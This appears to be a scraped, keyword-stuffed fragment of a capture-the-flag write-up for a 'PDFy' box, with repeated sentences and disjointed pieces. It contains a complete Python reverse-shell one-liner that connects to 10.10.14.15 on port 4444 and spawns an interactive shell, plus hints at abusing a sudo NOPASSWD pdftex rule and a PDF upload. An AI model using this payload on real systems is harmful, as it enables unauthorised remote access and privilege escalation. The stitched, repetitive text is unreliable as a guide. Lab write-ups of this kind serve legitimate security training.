Pdfy Htb Writeup Upd Info

The next step is to enumerate the services running on these ports to gather more information about the system.

"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'" pdfy htb writeup upd

http://127.0.0.1:8080/generate

(ALL) NOPASSWD: /usr/bin/pdftex

The pdf_file.pdf uploaded earlier can be modified to contain a reverse shell. The next step is to enumerate the services